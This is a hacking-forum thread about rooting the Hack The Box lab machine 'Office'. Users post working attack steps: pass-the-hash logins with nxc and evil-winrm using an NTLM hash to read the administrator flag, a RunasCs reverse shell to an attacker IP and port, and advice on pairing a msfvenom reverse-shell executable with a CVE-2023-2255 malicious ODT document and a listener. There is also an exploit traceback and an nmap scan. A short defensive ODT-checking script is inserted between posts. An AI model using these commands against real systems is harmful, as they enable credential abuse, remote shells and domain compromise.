Office - HTB
by paven - Saturday February 17, 2024 at 03:07 PM
(Feb 19, 2024, 04:51 PM)balckroot Wrote: One command and get root.txt

nxc winrm <ip> -u 'administrator' -p 'aad3b435b51404eeaad3b435b51404ee:f5b4f1e96c7ffca801ed5832e5e9105d' -x 'type C:\Users\Administrator\Desktop\root.txt'

Thanksss Men :3 I love u
Reply
(Feb 23, 2024, 08:06 PM)max1musgrand1mus Wrote: Hi all, do you know what to do after moving the .odt file? Because I can't get a shell for Pots. There is no LibreOffice to open it, and I didn't put my IP anywhere in the CVE-2023-2255 exploit file. How does that give me a revshell?
Thank you for your answer in advance!!!

You need to create a revshell.exe (use msfvenom) first and move it to the target machine. Once that’s done, you need to point to that revshell file in your odt exploit using the CVE you mentioned earlier.

Make sure you have a listener open (netcat or metasploit) before uploading into the app on port 8083
Reply
(Feb 18, 2024, 02:05 AM)ConnorDev Wrote:
(Feb 18, 2024, 01:57 AM)chillywilly Wrote: why do that when runascs can do it 
RunasCs.exe tstark <password> powershell -r 10.10.x.x:9001

Thanks for that!

Thanks for that too!!
Reply
I try to use the CVE-2023-2255 POC, but I have an error that I can't fix. Could someone help me?

$ python CVE-2023-2255.py --cmd "c:\users\public\met.exe" --output lu.odt
Traceback (most recent call last):
  File "/media/sf_vmshared/box/CVE-2023-2255.py", line 46, in <module>
    main()
  File "/media/sf_vmshared/box/CVE-2023-2255.py", line 14, in main
    with zipfile.ZipFile("./samples/test.odt", "r") as zip_ref:
        ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
  File "/usr/lib/python3.11/zipfile.py", line 1302, in __init__
    self._RealGetContents()
  File "/usr/lib/python3.11/zipfile.py", line 1369, in _RealGetContents
    raise BadZipFile("File is not a zip file")
zipfile.BadZipFile: File is not a zip file
Reply
Any help guys?? I got the user flag from the tstark account, now I don't know where to go from here.. I have tried chisel but it doesn't work for me to get sql
Reply
Download EvilWinRm From here

then 

./evil-winrm -u administrator -p aad3b435b51404eeaad3b435b51404ee:f5b4f1e96c7ffca801ed5832e5e9105d -i 10.10.11.3

go get root at C:\Users\Administrator\Desktop> type root.txt
Reply
(Feb 24, 2024, 05:14 PM)lucid777 Wrote: I try to use the CVE-2023-2255 POC, but I have an error that I can't fix. Could someone help me?

$ python CVE-2023-2255.py --cmd "c:\users\public\met.exe" --output lu.odt     
Traceback (most recent call last):
  File "/media/sf_vmshared/box/CVE-2023-2255.py", line 46, in <module>
    main()
  File "/media/sf_vmshared/box/CVE-2023-2255.py", line 14, in main
    with zipfile.ZipFile("./samples/test.odt", "r") as zip_ref:
        ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
  File "/usr/lib/python3.11/zipfile.py", line 1302, in __init__
    self._RealGetContents()
  File "/usr/lib/python3.11/zipfile.py", line 1369, in _RealGetContents
    raise BadZipFile("File is not a zip file")
zipfile.BadZipFile: File is not a zip file

Looks like you don’t have the .odt file in your exploit folder (local machine). Go back to the exploit GitHub page and download the ‘./samples/test.odt’ to the same folder and run
Reply
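
Added example (not part of any post in this thread, and not the PoC's code): a static, defender-side check of an .odt file that reports whether the bytes are a ZIP container at all, which is the condition behind the BadZipFile traceback above, and lists xlink:href targets in content.xml that point outside the package. The names triage_odt, build_sample and MAX_XML and the sample document are constructed for illustration.

```python
import io
import zipfile
import xml.etree.ElementTree as ET

XLINK_HREF = "{http://www.w3.org/1999/xlink}href"
ODT_MIME = "application/vnd.oasis.opendocument.text"
MAX_XML = 20 * 1024 * 1024  # refuse oversized content.xml (zip-bomb guard)

def triage_odt(data: bytes) -> dict:
    """Inspect ODT bytes statically; nothing is opened in an office suite."""
    report = {"is_zip": False, "mimetype_ok": False, "skipped_xml": False, "external_refs": []}
    try:
        zf = zipfile.ZipFile(io.BytesIO(data))
    except zipfile.BadZipFile:
        return report  # same condition as the traceback: bytes are not a ZIP
    with zf:
        report["is_zip"] = True
        names = set(zf.namelist())
        if "mimetype" in names:
            report["mimetype_ok"] = zf.read("mimetype").strip() == ODT_MIME.encode()
        if "content.xml" not in names:
            return report
        if zf.getinfo("content.xml").file_size > MAX_XML:
            report["skipped_xml"] = True
            return report
        raw = zf.read("content.xml")
        if b"<!DOCTYPE" in raw:  # ODF needs no DTD; avoid entity expansion
            report["skipped_xml"] = True
            return report
        for el in ET.fromstring(raw).iter():
            href = el.get(XLINK_HREF)
            # Package-internal targets look like "Pictures/a.png" or "#anchor"
            if href and (":" in href or href.startswith(("/", "\\", "../"))):
                report["external_refs"].append((el.tag.split("}")[-1], href))
    return report

def build_sample() -> bytes:
    """Constructed ODT-like package used only to exercise triage_odt()."""
    xml = (b'<office:document-content'
           b' xmlns:office="urn:oasis:names:tc:opendocument:xmlns:office:1.0"'
           b' xmlns:draw="urn:oasis:names:tc:opendocument:xmlns:drawing:1.0"'
           b' xmlns:xlink="http://www.w3.org/1999/xlink">'
           b'<draw:image xlink:href="Pictures/a.png"/>'
           b'<draw:floating-frame xlink:href="https://example.invalid/frame"/>'
           b'</office:document-content>')
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr("mimetype", ODT_MIME)
        zf.writestr("content.xml", xml)
    return buf.getvalue()
```
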
Thanks for sharing, I have rooted
Reply
(Feb 17, 2024, 10:57 PM)0xfd9aac Wrote:
(Feb 17, 2024, 10:56 PM)skyfallizhard Wrote: how are y'all getting a shell? i got the tstark creds on my own but then i hit a wall

Exploit admin panel from joomla.

Got password from kerberos hash for Iron Man, but where are you seeing Joomla running on this box? I don't see any web servers?

53/tcp    open  domain        syn-ack ttl 127 Simple DNS Plus
88/tcp    open  kerberos-sec  syn-ack ttl 127 Microsoft Windows Kerberos (server time: 2024-03-04 01:24:53Z)
139/tcp  open  netbios-ssn  syn-ack ttl 127 Microsoft Windows netbios-ssn
389/tcp  open  ldap          syn-ack ttl 127 Microsoft Windows Active Directory LDAP (Domain: office.htb0., Site: Default-First-Site-Name)
445/tcp  open  microsoft-ds? syn-ack ttl 127
464/tcp  open  kpasswd5?    syn-ack ttl 127
593/tcp  open  ncacn_http    syn-ack ttl 127 Microsoft Windows RPC over HTTP 1.0
636/tcp  open  ssl/ldap      syn-ack ttl 127 Microsoft Windows Active Directory LDAP (Domain: office.htb0., Site: Default-First-Site-Name)
3268/tcp  open  ldap          syn-ack ttl 127 Microsoft Windows Active Directory LDAP (Domain: office.htb0., Site: Default-First-Site-Name)
3269/tcp  open  ssl/ldap      syn-ack ttl 127 Microsoft Windows Active Directory LDAP (Domain: office.htb0., Site: Default-First-Site-Name)
5985/tcp  open  http          syn-ack ttl 127 Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
9389/tcp  open  mc-nmf        syn-ack ttl 127 .NET Message Framing
49664/tcp open  msrpc        syn-ack ttl 127 Microsoft Windows RPC
49668/tcp open  msrpc        syn-ack ttl 127 Microsoft Windows RPC
58013/tcp open  msrpc        syn-ack ttl 127 Microsoft Windows RPC
61037/tcp open  ncacn_http    syn-ack ttl 127 Microsoft Windows RPC over HTTP 1.0
61044/tcp open  msrpc        syn-ack ttl 127 Microsoft Windows RPC
61066/tcp open  msrpc        syn-ack ttl 127 Microsoft Windows RPC
Reply

